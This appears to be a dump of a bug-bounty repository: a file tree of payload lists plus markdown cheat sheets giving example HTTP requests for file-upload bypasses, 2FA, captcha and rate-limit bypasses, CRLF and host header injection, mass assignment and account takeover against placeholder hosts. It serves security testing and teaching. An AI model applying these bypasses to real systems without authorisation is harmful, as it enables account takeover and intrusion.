├── .gitignore ├── CompleteBugBounty ├── Arbitrary File Upload.md ├── Business Logic Errors.md ├── Bypass │ ├── Bypass 2FA.md │ ├── Bypass 304.md │ ├── Bypass 403.md │ ├── Bypass 429.md │ ├── Bypass CSRF.md │ └── Bypass Captcha.md ├── CRLF Injection.md ├── Checklist │ └── Forgot Password.md ├── Cross Site Request Forgery.md ├── Cross Site Scripting.md ├── Denial Of Service.md ├── Exposed Source Code.md ├── Host Header Injection.md ├── Insecure Direct Object References.md ├── Local File Inclusion.md ├── Mass Assignment.md ├── Misc │ ├── Account Takeover.md │ ├── Broken Link Hijacking.md │ ├── Default Credentials │ ├── Email Spoofing.md │ ├── Exposed API keys.md │ ├── JWT Vulnerabilities.md │ └── Tabnabbing.md ├── NoSQL Injection.md ├── OAuth Misconfiguration.md ├── Open Redirect.md ├── README.md ├── Reconnaissance │ ├── Github Dorks.md │ ├── Google Dorks.md │ ├── Scope.md │ └── Shodan Dorks.md ├── Remote File Inclusion.md ├── SQL Injection.md ├── Server Side Request Forgery.md ├── Technologies │ ├── Apache HTTP Server.md │ ├── Confluence.md │ ├── Grafana.md │ ├── HAProxy.md │ ├── Jenkins.md │ ├── Jira.md │ ├── Joomla.md │ ├── Laravel.md │ ├── Moodle.md │ ├── Nginx.md │ ├── WordPress.md │ └── Zend.md └── Web Cache Poisoning.md ├── LICENSE ├── README.md ├── code-of-conduct.md ├── contributing.md ├── cross-site-request-forgery └── xss-payload-list │ ├── Intruder │ └── xss-payload-list.txt │ ├── LICENSE │ └── README.md ├── cross-site-scripting └── xss-payload-list │ ├── Intruder │ └── xss-payload-list.txt │ ├── LICENSE │ └── README.md ├── csv-injection └── csv-injection-payloads │ ├── Intruder │ └── csv-payload.txt │ ├── LICENSE │ └── README.md ├── directory-traversal └── directory-payload-list │ ├── Intruder │ ├── default │ │ ├── big-1.txt │ │ ├── big.txt │ │ ├── common.txt │ │ ├── directory-list-1.0.txt │ │ ├── directory-list-2.3-medium.txt │ │ ├── directory-list-2.3-small.txt │ │ ├── directory-list-lowercase-2.3-medium.txt │ │ ├── directory-list-lowercase-2.3-small.txt │ │ └── small.txt │ ├── drupal │ │ ├── drupal_plugins.fuzz.txt │ │ └── drupal_themes.fuzz.txt │ ├── joomla │ │ ├── joomla.txt │ │ ├── joomla_plugins.fuzz.txt │ │ └── joomla_themes.fuzz.txt │ ├── sap │ │ ├── sap.fuzz.txt │ │ ├── sap.txt │ │ ├── sap_common.txt │ │ ├── sap_default.txt │ │ └── sap_icm_paths.txt │ ├── sharepoint │ │ ├── sharepoint-1.txt │ │ ├── sharepoint-2.txt │ │ └── sharepoint.fuzz.txt │ ├── tomcat │ │ ├── apachetomcat.fuzz.txt │ │ ├── tomcat-1.txt │ │ └── tomcat-2.txt │ ├── weblogic │ │ ├── weblogic-1.txt │ │ ├── weblogic-2.txt │ │ └── weblogic.fuzz.txt │ ├── websphere │ │ ├── websphere-1.txt │ │ ├── websphere-2.txt │ │ └── websphere.fuzz.txt │ └── wordpress │ │ ├── wordpress.fuzz.txt │ │ └── wordpress_detector.txt │ ├── LICENSE │ ├── README.md │ └── img │ └── directory-image.jpg ├── file-upload-vulnerabilities ├── How to Exploit File Upload Vulnerabilities (and How to Fix Them!) we45 Blogs.pdf └── file-upload.md ├── http-host-header-injection ├── HTTP-Host-Header-Injection.md └── Host-Header-Attack-Test │ ├── Host-Header-Vulnerability-Detection.py │ ├── LICENSE │ ├── README.md │ ├── crawler.py │ ├── mycrawler.txt │ ├── requirements.txt │ ├── results │ └── New Text Document.txt │ └── sitepath.txt ├── jwt-authentication └── json-web-tokens-introduction │ ├── CONTRIBUTING.md │ ├── LICENSE │ ├── Procfile │ ├── README-zh_CN.md │ ├── README.md │ ├── example │ ├── lib │ │ └── helpers.js │ ├── server.js │ ├── test │ │ ├── functional.js │ │ ├── integration.js │ │ └── mock.js │ └── views │ │ ├── fail.html │ │ ├── index.html │ │ └── restricted.html │ └── package.json ├── local-remote-file-inclusion └── rfi-lfi-payload-list │ ├── LICENSE │ ├── README.md │ └── img │ └── rfi-lfi.jpeg ├── oauth-authentication └── learn-json-web-tokens-master │ ├── README.md │ ├── api │ ├── jsconfig.json │ ├── nodemon.json │ ├── package-lock.json │ ├── package.json │ └── src │ │ ├── index.js │ │ ├── modules │ │ ├── common │ │ │ └── errors.js │ │ ├── note │ │ │ ├── index.js │ │ │ ├── model.js │ │ │ ├── mutation │ │ │ │ ├── index.js │ │ │ │ ├── remove.js │ │ │ │ └── save.js │ │ │ └── query │ │ │ │ ├── index.js │ │ │ │ └── list.js │ │ └── user │ │ │ ├── index.js │ │ │ ├── model.js │ │ │ ├── mutation │ │ │ ├── authorize │ │ │ │ ├── azure.js │ │ │ │ ├── bitbucket.js │ │ │ │ ├── digitalocean.js │ │ │ │ ├── discord.js │ │ │ │ ├── facebook.js │ │ │ │ ├── github.js │ │ │ │ ├── gitlab.js │ │ │ │ ├── google.js │ │ │ │ ├── index.js │ │ │ │ ├── instagram.js │ │ │ │ ├── linkedin.js │ │ │ │ ├── reddit.js │ │ │ │ ├── shopify.js │ │ │ │ ├── spotify.js │ │ │ │ ├── twitter.js │ │ │ │ └── zoom.js │ │ │ └── index.js │ │ │ └── query │ │ │ ├── authResponse.js │ │ │ ├── index.js │ │ │ └── profile.js │ │ └── setup │ │ ├── config │ │ ├── env.js │ │ └── params.js │ │ ├── helpers │ │ ├── utils.js │ │ └── validation.js │ │ └── server │ │ ├── authentication.js │ │ ├── database.js │ │ ├── endpoint.js │ │ ├── middlewares.js │ │ ├── modules.js │ │ └── start.js │ └── web │ ├── jsconfig.json │ ├── package-lock.json │ ├── package.json │ ├── public │ ├── favicon.ico │ ├── images │ │ ├── loader.gif │ │ ├── other │ │ │ ├── shopify.svg │ │ │ └── spotify.svg │ │ ├── preview.png │ │ ├── social │ │ │ ├── discord.svg │ │ │ ├── facebook.svg │ │ │ ├── google.svg │ │ │ ├── instagram.svg │ │ │ ├── linkedin.svg │ │ │ ├── reddit.svg │ │ │ ├── twitter.svg │ │ │ └── zoom.svg │ │ └── tech │ │ │ ├── azure.svg │ │ │ ├── bitbucket.svg │ │ │ ├── digitalocean.svg │ │ │ ├── github.svg │ │ │ └── gitlab.svg │ ├── index.html │ ├── logo192.png │ ├── logo512.png │ ├── manifest.json │ └── robots.txt │ └── src │ ├── index.js │ ├── modules │ ├── common │ │ ├── AuthCheck │ │ │ └── index.js │ │ ├── Footer │ │ │ ├── index.js │ │ │ └── style.css │ │ ├── Header │ │ │ ├── index.js │ │ │ └── style.css │ │ ├── Layout │ │ │ ├── index.js │ │ │ └── style.css │ │ └── RoutePrivate │ │ │ └── index.js │ ├── note │ │ ├── List │ │ │ ├── index.js │ │ │ └── style.css │ │ └── api │ │ │ └── actions │ │ │ ├── mutation │ │ │ ├── index.js │ │ │ ├── remove.js │ │ │ └── save.js │ │ │ └── query │ │ │ ├── index.js │ │ │ └── list.js │ ├── pages │ │ ├── Authorize │ │ │ ├── index.js │ │ │ └── style.css │ │ └── Home │ │ │ ├── index.js │ │ │ └── style.css │ └── user │ │ ├── Dashboard │ │ ├── index.js │ │ └── style.css │ │ ├── Profile │ │ ├── index.js │ │ └── style.css │ │ └── api │ │ ├── actions │ │ ├── mutation │ │ │ ├── authorize.js │ │ │ └── index.js │ │ ├── query │ │ │ ├── index.js │ │ │ ├── loginSetUser.js │ │ │ ├── loginSetUserLocalStorage.js │ │ │ ├── logout.js │ │ │ ├── logoutUnsetUserLocalStorage.js │ │ │ └── profile.js │ │ └── types.js │ │ └── state │ │ ├── auth.js │ │ └── index.js │ ├── serviceWorker.js │ ├── setup │ ├── config │ │ ├── env.js │ │ └── params.js │ ├── oauth │ │ ├── azure.js │ │ ├── bitbucket.js │ │ ├── digitalocean.js │ │ ├── discord.js │ │ ├── facebook.js │ │ ├── github.js │ │ ├── gitlab.js │ │ ├── google.js │ │ ├── instagram.js │ │ ├── linkedin.js │ │ ├── reddit.js │ │ ├── shopify.js │ │ ├── spotify.js │ │ ├── twitter.js │ │ └── zoom.js │ ├── routes.js │ └── store.js │ └── ui │ ├── Button │ ├── index.js │ └── style.css │ ├── Input │ ├── index.js │ └── style.css │ └── common │ ├── colors.css │ └── reset.css ├── open-redirect └── open-redirect-payload-list │ ├── LICENSE │ └── README.md ├── os-command-injection └── command-injection-payload-list │ ├── LICENSE │ └── README.md ├── server-side-request-forgery └── ssti-payloads │ ├── Intruder │ └── ssti-payloads.txt │ ├── LICENSE │ └── README.md ├── sql-injection └── sql-injection-payload-list │ ├── Image │ └── sql-injection.svg │ ├── Intruder │ ├── detect │ │ ├── GenericBlind.txt │ │ ├── Generic_ErrorBased.txt │ │ ├── Generic_SQLI.txt │ │ ├── Generic_TimeBased.txt │ │ ├── Generic_UnionSelect.txt │ │ ├── MSSQL │ │ │ ├── MSSQL.txt │ │ │ └── MSSQL_blind.txt │ │ ├── MySQL │ │ │ ├── MySQL.txt │ │ │ └── MySQL_MSSQL.txt │ │ ├── NoSQL │ │ │ └── no-sql.txt │ │ ├── Oracle │ │ │ └── oracle.txt │ │ └── xPlatform │ │ │ └── xplatform.txt │ ├── exploit │ │ ├── Auth_Bypass.txt │ │ ├── DB2 │ │ │ └── db2-enumeration.txt │ │ ├── MSSQL │ │ │ └── ms-sql-enumeration.txt │ │ ├── MySQL │ │ │ ├── mysql-injection-login-bypass.txt │ │ │ └── mysql-read-local-files.txt │ │ └── PostgresSQL │ │ │ └── postgres-enumeration.txt │ └── payloads-sql-blind │ │ ├── MSSQL │ │ ├── payloads-sql-blind-MSSQL-INSERT.txt │ │ └── payloads-sql-blind-MSSQL-WHERE.txt │ │ └── MySQL │ │ ├── payloads-sql-blind-MySQL-INSERT.txt │ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt │ │ └── payloads-sql-blind-MySQL-WHERE.txt │ ├── LICENSE │ └── README.md └── xml-external-entity-xxe-injection └── xxe-injection-payload-list ├── Image └── xxe-injection.jpg ├── Intruder └── xxe-injection-payload-list.txt.txt ├── LICENSE └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | *.lib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | -------------------------------------------------------------------------------- /CompleteBugBounty/Arbitrary File Upload.md: -------------------------------------------------------------------------------- 1 | # Arbitrary File Upload 2 | 3 | ## Introduction 4 | An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server. 5 | 6 | ## Where to find 7 | In upload file feature, for example upload photo profile feature 8 | 9 | ## How to exploit 10 | 1. Change the `Content-Type` value 11 | ``` 12 | POST /images/upload/ HTTP/1.1 13 | Host: target.com 14 | ... 15 | 16 | ---------------------------829348923824 17 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php" 18 | Content-Type: application/x-php 19 | ``` 20 | Change the Content-Type 21 | ``` 22 | POST /images/upload/ HTTP/1.1 23 | Host: target.com 24 | ... 25 | 26 | ---------------------------829348923824 27 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php" 28 | Content-Type: image/jpeg 29 | ``` 30 | 31 | 2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file 32 | ``` 33 | POST /images/upload/ HTTP/1.1 34 | Host: target.com 35 | ... 36 | 37 | ---------------------------829348923824 38 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" 39 | Content-Type: application/x-php 40 | ``` 41 | Change the request to this 42 | ``` 43 | POST /images/upload/ HTTP/1.1 44 | Host: target.com 45 | ... 46 | 47 | ---------------------------829348923824 48 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php" 49 | Content-Type: application/x-php 50 | ``` 51 | 52 | 3. Upload the payload, but start with GIF89a; and 53 | ``` 54 | POST /images/upload/ HTTP/1.1 55 | Host: target.com 56 | ... 57 | 58 | ---------------------------829348923824 59 | Content-Disposition: form-data; name="uploaded"; filename="dapos.php" 60 | Content-Type: image/gif 61 | 62 | GIF89a; 63 | ``` 64 | And dont forget to change the content-type to image/gif 65 | 66 | 4. Bypass content length validation, it can be bypassed using small payload 67 | ``` 68 | () 69 | ``` 70 | 71 | 5. Using null byte in filename 72 | ``` 73 | file.php%00.gif 74 | ``` 75 | 76 | 6. Using double extensions for the uploaded file 77 | ``` 78 | file.jpg.php 79 | ``` 80 | 81 | 7. Uploading an unpopular php extensions (php4,php5,php6,phtml) 82 | ``` 83 | file.php5 84 | ``` 85 | 86 | 8. Try to randomly capitalizes the file extension 87 | ``` 88 | file.pHP5 89 | ``` 90 | 91 | 9. Mix the tips! 92 | -------------------------------------------------------------------------------- /CompleteBugBounty/Bypass/Bypass 2FA.md: -------------------------------------------------------------------------------- 1 | # Bypass Two-Factor Authentication 2 | 3 | 1. Response manipulation 4 | 5 | The response is 6 | ``` 7 | HTTP/1.1 404 Not Found 8 | ... 9 | {"code": false} 10 | ``` 11 | Try this to bypass 12 | ``` 13 | HTTP/1.1 404 Not Found 14 | ... 15 | {"code": true} 16 | ``` 17 | 18 | 2. Status code manipulation 19 | 20 | The response is 21 | ``` 22 | HTTP/1.1 404 Not Found 23 | ... 24 | {"code": false} 25 | ``` 26 | Try this to bypass 27 | ``` 28 | HTTP/1.1 200 OK 29 | ... 30 | {"code": false} 31 | ``` 32 | 33 | 3. 2FA Code in Response 34 | 35 | Always check the response! 36 | ``` 37 | POST /req-2fa/ 38 | Host: vuln.com 39 | ... 40 | email=victim@gmail.com 41 | ``` 42 | The response is 43 | ``` 44 | HTTP/1.1 200 OK 45 | ... 46 | {"email": "victim@gmail.com", "code": "101010"} 47 | ``` 48 | 49 | 4. JS Files may contain info about the 2FA Code (Rare case) 50 | 51 | 5. Bruteforce the 2FA code 52 | 53 | 6. Missing 2FA Code integrity validation, code for any user account can be used 54 | ``` 55 | POST /2fa/ 56 | Host: vuln.com 57 | ... 58 | email=attacker@gmail.com&code=382923 59 | ``` 60 | ``` 61 | POST /2fa/ 62 | Host: vuln.com 63 | ... 64 | email=victim@gmail.com&code=382923 65 | ``` 66 | 67 | 7. No CSRF protection on disabling 2FA, also there is no auth confirmation. 68 | 69 | 8. 2FA gets disabled on password change/email change. 70 | 71 | 9. Clickjacking on 2FA disabling page, by iframing the 2FA Disabling page and lure the victim to disable the 2FA. 72 | 73 | 10. Enabling 2FA doesn't expire previously active sessions, if the session is already hijacked and there is a session timeout vuln. 74 | 75 | 11. 2FA code reusability, same code can be reused. 76 | 77 | 12. Enter code 000000 78 | ``` 79 | POST /2fa/ 80 | Host: vuln.com 81 | ... 82 | code=00000 83 | ``` 84 | 85 | 13. Enter code "null" 86 | ``` 87 | POST /2fa/ 88 | Host: vuln.com 89 | ... 90 | code=null 91 | ``` 92 | 93 | ## References 94 | * [Harsh Bothra](https://twitter.com/harshbothra_) 95 | * Other writeup -------------------------------------------------------------------------------- /CompleteBugBounty/Bypass/Bypass 304.md: -------------------------------------------------------------------------------- 1 | # Bypass 304 (Not Modified) 2 | 3 | 1. Delete "If-None-Match" header 4 | ``` 5 | GET /admin HTTP/1.1 6 | Host: target.com 7 | If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" 8 | ``` 9 | Try this to bypass 10 | ``` 11 | GET /admin HTTP/1.1 12 | Host: target.com 13 | ``` 14 | 15 | 2. Adding random character in the end of "If-None-Match" header 16 | ``` 17 | GET /admin HTTP/1.1 18 | Host: target.com 19 | If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" 20 | ``` 21 | Try this to bypass 22 | ``` 23 | GET /admin HTTP/1.1 24 | Host: target.com 25 | Host: target.com 26 | If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b 27 | ``` 28 | 29 | ## References 30 | * [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521) 31 | -------------------------------------------------------------------------------- /CompleteBugBounty/Bypass/Bypass 403.md: -------------------------------------------------------------------------------- 1 | # Bypass 403 (Forbidden) 2 | 3 | 1. Using "X-Original-URL" header 4 | ``` 5 | GET /admin HTTP/1.1 6 | Host: target.com 7 | ``` 8 | Try this to bypass 9 | ``` 10 | GET /anything HTTP/1.1 11 | Host: target.com 12 | X-Original-URL: /admin 13 | ``` 14 | 15 | 2. Appending **%2e** after the first slash 16 | ``` 17 | http://target.com/admin => 403 18 | ``` 19 | Try this to bypass 20 | ``` 21 | http://target.com/%2e/admin => 200 22 | ``` 23 | 24 | 3. Try add dot (.) slash (/) and semicolon (;) in the URL 25 | ``` 26 | http://target.com/admin => 403 27 | ``` 28 | Try this to bypass 29 | ``` 30 | http://target.com/secret/. => 200 31 | http://target.com//secret// => 200 32 | http://target.com/./secret/.. => 200 33 | http://target.com/;/secret => 200 34 | http://target.com/.;/secret => 200 35 | http://target.com//;//secret => 200 36 | ``` 37 | 38 | 4. Add "..;/" after the directory name 39 | ``` 40 | http://target.com/admin 41 | ``` 42 | Try this to bypass 43 | ``` 44 | http://target.com/admin..;/ 45 | ``` 46 | 47 | 48 | 5. Try to uppercase the alphabet in the url 49 | ``` 50 | http://target.com/admin 51 | ``` 52 | Try this to bypass 53 | ``` 54 | http://target.com/aDmIN 55 | ``` 56 | 57 | 6. Via Web Cache Poisoning 58 | ``` 59 | GET /anything HTTP/1.1 60 | Host: victim.com 61 | X­-Original-­URL: /admin 62 | ``` 63 | 64 | ## Tools 65 | * [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403) 66 | 67 | ## References 68 | - [@iam_j0ker](https://twitter.com/iam_j0ker) 69 | - [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web) 70 | -------------------------------------------------------------------------------- /CompleteBugBounty/Bypass/Bypass 429.md: -------------------------------------------------------------------------------- 1 | # Bypass 429 (Too Many Requests) 2 | 3 | 1. Try add some custom header 4 | ``` 5 | X-Forwarded-For : 127.0.0.1 6 | X-Forwarded-Host : 127.0.0.1 7 | X-Client-IP : 127.0.0.1 8 | X-Remote-IP : 127.0.0.1 9 | X-Remote-Addr : 127.0.0.1 10 | X-Host : 127.0.0.1 11 | ``` 12 | For example: 13 | ``` 14 | POST /ForgotPass.php HTTP/1.1 15 | Host: target.com 16 | X-Forwarded-For : 127.0.0.1 17 | ... 18 | 19 | email=victim@gmail.com 20 | ``` 21 | 22 | 2. Adding Null Byte ( %00 ) or CRLF ( %09, %0d, %0a ) at the end of the Email can bypass rate limit. 23 | ``` 24 | POST /ForgotPass.php HTTP/1.1 25 | Host: target.com 26 | ... 27 | 28 | email=victim@gmail.com%00 29 | ``` 30 | 31 | 3. Try changing user-agents, cookies and IP address 32 | ``` 33 | POST /ForgotPass.php HTTP/1.1 34 | Host: target.com 35 | Cookie: xxxxxxxxxx 36 | ... 37 | 38 | email=victim@gmail.com 39 | ``` 40 | Try this to bypass 41 | ``` 42 | POST /ForgotPass.php HTTP/1.1 43 | Host: target.com 44 | Cookie: aaaaaaaaaaaaa 45 | ... 46 | 47 | email=victim@gmail.com 48 | ``` 49 | 50 | 4. Add a random parameter on the last endpoint 51 | ``` 52 | POST /ForgotPass.php HTTP/1.1 53 | Host: target.com 54 | ... 55 | 56 | email=victim@gmail.com 57 | ``` 58 | Try this to bypass 59 | ``` 60 | POST /ForgotPass.php?random HTTP/1.1 61 | Host: target.com 62 | ... 63 | 64 | email=victim@gmail.com 65 | ``` 66 | 67 | 5. Add space after the parameter value 68 | ``` 69 | POST /api/forgotpass HTTP/1.1 70 | Host: target.com 71 | ... 72 | 73 | {"email":"victim@gmail.com"} 74 | ``` 75 | Try this to bypass 76 | ``` 77 | POST /api/forgotpass HTTP/1.1 78 | Host: target.com 79 | ... 80 | 81 | {"email":"victim@gmail.com "} 82 | ``` 83 | 84 | ## References 85 | * [Huzaifa Tahir](https://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd) 86 | * [Gupta Bless](https://gupta-bless.medium.com/rate-limiting-and-its-bypassing-5146743b16be) -------------------------------------------------------------------------------- /CompleteBugBounty/Bypass/Bypass Captcha.md: -------------------------------------------------------------------------------- 1 | # Bypass Captcha (Google reCAPTCHA) 2 | 3 | 1. Try changing the request method, for example POST to GET 4 | ``` 5 | POST / HTTP 1.1 6 | Host: target.com 7 | ... 8 | 9 | _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 10 | ``` 11 | 12 | Change the method to GET 13 | ``` 14 | GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1 15 | Host: target.com 16 | ... 17 | ``` 18 | 19 | 2. Try remove the value of the captcha parameter 20 | ``` 21 | POST / HTTP 1.1 22 | Host: target.com 23 | ... 24 | 25 | _RequestVerificationToken=&_Username=daffa&_Password=test123 26 | ``` 27 | 28 | 3. Try reuse old captcha token 29 | ``` 30 | POST / HTTP 1.1 31 | Host: target.com 32 | ... 33 | 34 | _RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123 35 | ``` 36 | 37 | 4. Convert JSON data to normal request parameter 38 | ``` 39 | POST / HTTP 1.1 40 | Host: target.com 41 | ... 42 | 43 | {"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"} 44 | ``` 45 | Convert to normal request 46 | ``` 47 | POST / HTTP 1.1 48 | Host: target.com 49 | ... 50 | 51 | _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 52 | ``` 53 | 54 | 5. Try custom header to bypass captcha 55 | ``` 56 | X-Originating-IP: 127.0.0.1 57 | X-Forwarded-For: 127.0.0.1 58 | X-Remote-IP: 127.0.0.1 59 | X-Remote-Addr: 127.0.0.1 60 | ``` 61 | 62 | 6. Change some specific characters of the captcha parameter and see if it is possible to bypass the restriction. 63 | ``` 64 | POST / HTTP 1.1 65 | Host: target.com 66 | ... 67 | 68 | _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 69 | ``` 70 | Try this to bypass 71 | ``` 72 | POST / HTTP 1.1 73 | Host: target.com 74 | ... 75 | 76 | _RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123 77 | ``` 78 | -------------------------------------------------------------------------------- /CompleteBugBounty/CRLF Injection.md: -------------------------------------------------------------------------------- 1 | # CRLF Injection 2 | 3 | ## Introduction 4 | A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. 5 | 6 | ## Where to find 7 | It can be found anywhere, always check the request and response. Try to search for parameters that lead to redirects, you can see the response is (301, 302, 303, 307, 308). 8 | 9 | ## How to exploit 10 | 1. Basic payload 11 | ``` 12 | https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/ 13 | ``` 14 | The response is 15 | ``` 16 | HTTP/1.1 200 OK 17 | Content-Type: text/html 18 | Date: Mon, 09 May 2016 14:47:29 GMT 19 | Set-Cookie: language=en 20 | Location: https://evil.com/ 21 | ``` 22 | 23 | 2. Double encode 24 | ``` 25 | https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/ 26 | ``` 27 | 28 | 3. Bypass unicode 29 | ``` 30 | https://example.com/?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/ 31 | ``` 32 | 33 | ## References 34 | * [@filedescriptor](https://blog.innerht.ml/twitter-crlf-injection/) 35 | * [EdOverflow](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md) -------------------------------------------------------------------------------- /CompleteBugBounty/Exposed Source Code.md: -------------------------------------------------------------------------------- 1 | # Exposed Source Code 2 | 3 | ## Introduction 4 | Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application. 5 | 6 | ## Where to find 7 | `-` 8 | 9 | ## How to exploit 10 | 1. Exposed Git folder 11 | ``` 12 | https://site.com/.git 13 | ``` 14 | ![GIT folder](https://1.bp.blogspot.com/-wTZOuULaqNw/XliI9jS0w3I/AAAAAAAAATA/VZxs7VL5PCY8FdnoKaEjS6AWpcjoJz4MgCLcBGAsYHQ/s1600/1.png) 15 | 16 | Tools to dump .git 17 | * https://github.com/arthaud/git-dumper 18 | 19 | 2. Exposed Subversion folder 20 | ``` 21 | https://site.com/.svn 22 | ``` 23 | ![SVN folder](https://1.bp.blogspot.com/-5bC_EhFShgk/XliJqiw8pJI/AAAAAAAAATI/2HhrX0Ea3MwQ60Ax2tzNprNvulggPrZAACLcBGAsYHQ/s1600/1.png) 24 | 25 | Tools to dump .svn 26 | * https://github.com/anantshri/svn-extractor 27 | 28 | 3. Exposed Mercurial folder 29 | ``` 30 | https://site.com/.hg 31 | ``` 32 | ![HG folder](https://1.bp.blogspot.com/-4FaqUeTlv4k/XliKHBOpgmI/AAAAAAAAATQ/sLdwhvSF-Jgn0WF5P-PouLp6uTeHUAOWACLcBGAsYHQ/s1600/1.png) 33 | 34 | Tools to dump .hg 35 | * https://github.com/arthaud/hg-dumper 36 | 37 | 4. Exposed Bazaar folder 38 | ``` 39 | http://target.com/.bzr 40 | ``` 41 | ![BZR folder](https://1.bp.blogspot.com/-67WO_kL_iB8/XliKl1jggAI/AAAAAAAAATc/mWBw7igq05EdKR3JZmbXYN4LqjpBOrESgCLcBGAsYHQ/s1600/1.png) 42 | 43 | Tools to dump .bzr 44 | * https://github.com/shpik-kr/bzr_dumper 45 | 46 | 5. Exposed Darcs folder 47 | ``` 48 | http://target.com/_darcs 49 | ``` 50 | 51 | Tools to dump _darcs (Not found) 52 | 53 | 6. Exposed Bitkeeper folder 54 | ``` 55 | http://target.com/Bitkeeper 56 | ``` 57 | 58 | Tools to dump BitKeeper (Not found) 59 | 60 | ## Reference 61 | * [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html) 62 | -------------------------------------------------------------------------------- /CompleteBugBounty/Host Header Injection.md: -------------------------------------------------------------------------------- 1 | # Host Header Injection 2 | 3 | ## Introduction 4 | HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks. 5 | 6 | ## Where to find 7 | In the feature where the website can send email to us. For example forgot password / newsletter. 8 | 9 | ## How to exploit 10 | 1. Change the host header 11 | ``` 12 | GET /index.php HTTP/1.1 13 | Host: evil-website.com 14 | ... 15 | ``` 16 | 2. Duplicating the host header 17 | ``` 18 | GET /index.php HTTP/1.1 19 | Host: vulnerable-website.com 20 | Host: evil-website.com 21 | ... 22 | ``` 23 | 3. Add line wrapping 24 | ``` 25 | GET /index.php HTTP/1.1 26 | Host: vulnerable-website.com 27 | Host: evil-website.com 28 | ... 29 | ``` 30 | 4. Add host override headers 31 | ``` 32 | X-Forwarded-For: evil-website.com 33 | X-Forwarded-Host: evil-website.com 34 | X-Client-IP: evil-website.com 35 | X-Remote-IP: evil-website.com 36 | X-Remote-Addr: evil-website.com 37 | X-Host: evil-website.com 38 | ``` 39 | How to use? In this case im using "X-Forwarded-For : evil.com" 40 | ``` 41 | GET /index.php HTTP/1.1 42 | Host: vulnerable-website.com 43 | X-Forwarded-For : evil-website.com 44 | ... 45 | ``` 46 | 5. Supply an absolute URL 47 | ``` 48 | GET https://vulnerable-website.com/ HTTP/1.1 49 | Host: evil-website.com 50 | ... 51 | ``` 52 | 53 | ## References 54 | * [PortSwigger](https://portswigger.net/web-security/host-header/exploiting) 55 | -------------------------------------------------------------------------------- /CompleteBugBounty/Mass Assignment.md: -------------------------------------------------------------------------------- 1 | # Mass Assignment Attack 2 | 3 | ## Introduction 4 | Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS 5 | 6 | ## How to exploit 7 | - Normal request 8 | ``` 9 | POST /editdata HTTP/1.1 10 | Host: target.com 11 | ... 12 | 13 | username=daffa 14 | ``` 15 | The response 16 | ``` 17 | HTTP/1.1 200 OK 18 | ... 19 | 20 | {"status":"success","username":"daffainfo","isAdmin":"false"} 21 | ``` 22 | 23 | - Modified Request 24 | ``` 25 | POST /editdata HTTP/1.1 26 | Host: target.com 27 | ... 28 | 29 | username=daffa&admin=true 30 | ``` 31 | 32 | ``` 33 | HTTP/1.1 200 OK 34 | ... 35 | 36 | {"status":"success","username":"daffainfo","isAdmin":"true"} 37 | ``` 38 | 39 | ## References 40 | * [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda) -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Account Takeover.md: -------------------------------------------------------------------------------- 1 | # Account Takeover 2 | 3 | ## Introduction 4 | Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else. 5 | 6 | ## How to exploit 7 | 1. Using OAuth Misconfiguration 8 | - Victim has a account in evil.com 9 | - Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email 10 | - Attacker changed his/her email to victim email. 11 | - When the victim try to create an account on evil.com, it says the email already exists. 12 | 13 | 2. Try re-sign up using same email 14 | ``` 15 | POST /newaccount HTTP/1.1 16 | ... 17 | email=victim@mail.com&password=1234 18 | ``` 19 | After sign up using victim 